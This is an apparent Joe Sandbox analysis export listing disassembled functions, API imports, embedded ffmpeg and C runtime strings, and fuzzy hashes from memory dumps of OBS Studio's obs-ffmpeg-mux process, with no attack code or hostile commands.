Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Failed to compensate for timestamp delta of %f$compensating audio timestamp drift:%f compensation:%d in:%d
API String ID: 0-3137371971
Opcode ID: 9453577323ccaac385d38161161e3fdd902f05c07b8afe89a999298048375f23
Instruction ID: 7d518fcee4d4e356ebf2a54387758688e1dcb75ea60347aa2558be36df8dac44
Opcode Fuzzy Hash: 9453577323ccaac385d38161161e3fdd902f05c07b8afe89a999298048375f23
Instruction Fuzzy Hash: F1713922E1979A81EA528F7A5411379A364AF99FC8F0DC332DF0D67394EF3CB5818210

Function 00007FF8BFB84044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB841C3

Strings

, xrefs: 00007FF8BFB84114
csm, xrefs: 00007FF8BFB84093
csm, xrefs: 00007FF8BFB841FD

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction ID: faade396d2b35e33dd69e20979e8f05f9c4a2f9f4108ca993e3d704a9d3d2502
Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction Fuzzy Hash: 1B719D32A08691C6DB689FA994507B97BA1FB95BC8F148136DF8C07A8ACB3CD491C741

Function 00007FF8BFB83E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB83F13
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BFB83F23

Strings

csm, xrefs: 00007FF8BFB83F75
csm, xrefs: 00007FF8BFB83E66

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction ID: 026dec830c188771ae41d1273138dbca89e8d0415f1fd6593ccf698e119f80a3
Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction Fuzzy Hash: 25516C33908682C6EB748F9AA44426977A0FB94BD5F184136DB9D47BD6CF3CE461C740

Function 00007FF8A7C215C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C21747

Strings

nb_jobs > 0, xrefs: 00007FF8A7C21723
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C21733
src/libavutil/slicethread.c, xrefs: 00007FF8A7C2171C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$nb_jobs > 0$src/libavutil/slicethread.c
API String ID: 4206212132-1031856425
Opcode ID: 6ee0518d565bae88eeec7544e1c0ff8f03f36ef7bb88ca07a7aea4a2878acd5c
Instruction ID: 533094313a4d15c9a42a8f1989e2883cb9bbdd8e5a8c04054a37729a3c196c64
Opcode Fuzzy Hash: 6ee0518d565bae88eeec7544e1c0ff8f03f36ef7bb88ca07a7aea4a2878acd5c
Instruction Fuzzy Hash: 5041AD36A06A02A7EB64DF1AE40066EB7A1FB84BD8F588135DE4D03654DF3DE542D780

Function 00007FF8A7BE5FB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BE5FC9
strspn.MSVCRT ref: 00007FF8A7BE6030
strspn.MSVCRT ref: 00007FF8A7BE60B6

Strings

, xrefs: 00007FF8A7BE5FEA, 00007FF8A7BE60A3

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strspn$strlen
String ID:
API String ID: 697951671-596783616
Opcode ID: c2f3e75c8f79a9c271b989593eea45416c26161b9ab45691b9c7843e23effee5
Instruction ID: d1301a8d56fb1a5fe3d3b172f6073908e622d88fb24a1a74b5b73145d63f3c92
Opcode Fuzzy Hash: c2f3e75c8f79a9c271b989593eea45416c26161b9ab45691b9c7843e23effee5
Instruction Fuzzy Hash: C13190B1A0E2A264EB568F11566027D5AA2EF05BCCF484071DE5D5B3C7EE2DE443A300

Function 00007FF8A7C08990 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strtol.MSVCRT ref: 00007FF8A7C08A4A

Strings

Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 00007FF8A7C08ADA
Unable to parse option value "%s" as %s, xrefs: 00007FF8A7C08A79
none, xrefs: 00007FF8A7C089B2

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strtol
String ID: Unable to parse option value "%s" as %s$Value %d for parameter '%s' out of %s format range [%d - %d]$none
API String ID: 76114499-2908652078
Opcode ID: 3dc9da589c42dd02856a593b1258d03a0b292f87372d4db75a7a8f83acead3ae
Instruction ID: 1b52b3dc465e3ea912593d4ee65ce572fb23baca4fbe04d7f6950f006c93c3f3
Opcode Fuzzy Hash: 3dc9da589c42dd02856a593b1258d03a0b292f87372d4db75a7a8f83acead3ae
Instruction Fuzzy Hash: AC312A22B0EA82A5E7618F31680067E6291EB857E4F10C331EE5D53FD4DF3CE5929B80

Function 00007FF8BFB8A714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A778

Strings

%lf, xrefs: 00007FF8BFB8A7BE

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction ID: d2aa59a95ba348ae2eb96ea084b58970d97aa0de1da66ed5d38dfff3fa423e91
Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction Fuzzy Hash: 2131A43690CA8595EB20CFA8E85127AB765FBC9BC4F448235EB9E47646DF3CE501C740

Function 00007FF8A7BFD880 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strtol.MSVCRT ref: 00007FF8A7BFD8AF

Strings

Using CUDA primary device context, xrefs: 00007FF8A7BFD8E0
primary_ctx, xrefs: 00007FF8A7BFD889
Disabling use of CUDA primary device context, xrefs: 00007FF8A7BFD8B8

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strtol
String ID: Disabling use of CUDA primary device context$Using CUDA primary device context$primary_ctx
API String ID: 76114499-1919470267
Opcode ID: 3c091e27e2dbc98c8e65e12db3f15324b02cb9e40d48561a3b36329f0690444e
Instruction ID: e2ef5e22fe581f9dc831c5e48f09e4c7d6a458590105100341a434b140034c93
Opcode Fuzzy Hash: 3c091e27e2dbc98c8e65e12db3f15324b02cb9e40d48561a3b36329f0690444e
Instruction Fuzzy Hash: 6EF0BEA5F0B602B0FB54AF66A4296BD1211EF86BD1FC06432DC0D4A7E2DD3CE042E300

Function 00007FF8BFB82400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8243E

Strings

csm, xrefs: 00007FF8BFB82420
RCC, xrefs: 00007FF8BFB82410
MOC, xrefs: 00007FF8BFB82418

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction ID: a0774adaa420c87953666972b9ea45e83bc8bcc30b06e39ebe77d05732468535
Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction Fuzzy Hash: BBF0FF3A91864685EB505FA9E2810693765FBC8B84F099476DB5807653CF3CD890C651

Function 00007FF8A7BE9960 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BE99A4

Strings

Assertion %s failed at %s:%d, xrefs: 00007FF8A7BE9990
buf, xrefs: 00007FF8A7BE9980
src/libavutil/buffer.c, xrefs: 00007FF8A7BE9979

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$buf$src/libavutil/buffer.c
API String ID: 4206212132-2693306993
Opcode ID: 6a1729c8ae82779914f64dfb9c10cf82327e2bfa5a8fbcb130779104fee64848
Instruction ID: d497058eebae1f2f5431c43941f42f43539e3ed895b1b0d0a0793a37101191d7
Opcode Fuzzy Hash: 6a1729c8ae82779914f64dfb9c10cf82327e2bfa5a8fbcb130779104fee64848
Instruction Fuzzy Hash: CCE06D76A0AA06E1EB159F65E4000AD27A1FF88784F948136DA4C433B0DF3CE106D704

Function 00007FF8BFB8E9E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FF8BFB8E9F0

Part of subcall function 00007FF8BFB8EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BFB8ECF0
Part of subcall function 00007FF8BFB8EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BFB8E9F5), ref: 00007FF8BFB8ED3F

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8EA1A

Strings

f, xrefs: 00007FF8BFB8E9F5
csm, xrefs: 00007FF8BFB8E9FB

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 2451123448-629598281
Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction ID: ffdc250335e1efb96b3420e1bb4df510b76b3db3ecb31a25136871b0e8f01f6d
Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction Fuzzy Hash: 28E06D36D1828281EB206BE9B18113D27A5BF95BD4F148039DB4807687CE3CE8A0C641

Function 00007FF8A7C07500 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 14COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C0752F

Strings

val || !min_size, xrefs: 00007FF8A7C0750F
src/libavutil/mem.c, xrefs: 00007FF8A7C07504
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C07516

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$src/libavutil/mem.c$val || !min_size
API String ID: 4206212132-3343232236
Opcode ID: 9f2d832eee8a386a6791954090d46eb0d2479cb7aefd3148675639f8814a35ca
Instruction ID: b0f14920ce32e1f8a7e0921cfd564ff54e0811e513030dc512ab483dc7234c61
Opcode Fuzzy Hash: 9f2d832eee8a386a6791954090d46eb0d2479cb7aefd3148675639f8814a35ca
Instruction Fuzzy Hash: C0E0466190AA42B1E710AF50A8002FD3B71FB88384F808636E54E26A60CF3CA206D724

Function 00007FF8A7BF55A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 12COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BF55CF

Strings

src/libavutil/fifo.c, xrefs: 00007FF8A7BF55A4
cur_size >= size, xrefs: 00007FF8A7BF55AF
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BF55B6

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$cur_size >= size$src/libavutil/fifo.c
API String ID: 4206212132-2007657860
Opcode ID: 88a5e5efd281f7ab3c7b4b2a72e72c85cd5da5ff7f8b021ecd333fd393f9dcb8
Instruction ID: 78415e82ad248282eba9cf7ba3e6c9a5fa55ad77aca51bf1bcdaae3a9a9ca19e
Opcode Fuzzy Hash: 88a5e5efd281f7ab3c7b4b2a72e72c85cd5da5ff7f8b021ecd333fd393f9dcb8
Instruction Fuzzy Hash: 01D0123290A956E5E314EF50A4122FD67A2FB48384F804576D54D13262CF3CD105D784

Function 00007FF8BFB89CC0 Relevance: 6.2, APIs: 4, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C459
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C492
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89E19
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89E78
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89EAA
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89EBA

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction ID: 0f940d71045aad1eb60dda49bd35a46817eb2b419a99c94bcdf52cedb3b94dd1
Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction Fuzzy Hash: 73915E62E0875699FB118BE8D8413BC3BB1BB94B88F548039DF4E5769ADF7CA845C340

Function 00007FF8BFB8A44C Relevance: 6.1, APIs: 4, Instructions: 134COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A4F1
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A501
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A51E
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A553

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction ID: bc6dc597271701b998f807160e2c15e3beb9fd51ba989bd6daae0876db1a0b44
Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction Fuzzy Hash: 48517972E18A56A8E710CFA8E8413BC77A5BB85B88F548135DB0E1779ADF3DE481C340

Function 00007FF8BFBA3BE0 Relevance: 6.1, APIs: 4, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF8BFBA3C3E
ResetEvent.KERNEL32 ref: 00007FF8BFBA3C8E
WaitForSingleObject.KERNEL32 ref: 00007FF8BFBA3D0F

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ObjectSingleWait$EventReset
String ID:
API String ID: 466820088-0
Opcode ID: 23d1a419ce0311e38330c9e7fff77312c1ba9e2a20c5924deb88d3609af00be2
Instruction ID: 42864604935c4123fecfc7ea0ce021d9d9ac74849b2da8ac78a119f5f2f991ad
Opcode Fuzzy Hash: 23d1a419ce0311e38330c9e7fff77312c1ba9e2a20c5924deb88d3609af00be2
Instruction Fuzzy Hash: FE416D33B08682C2EB55DF69E4402AE73A1EB84BC4F484035EB9D47A99EF3DD955CB40

Function 00007FF8BFB51010 Relevance: 6.1, APIs: 4, Instructions: 124sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF8BFB5105D
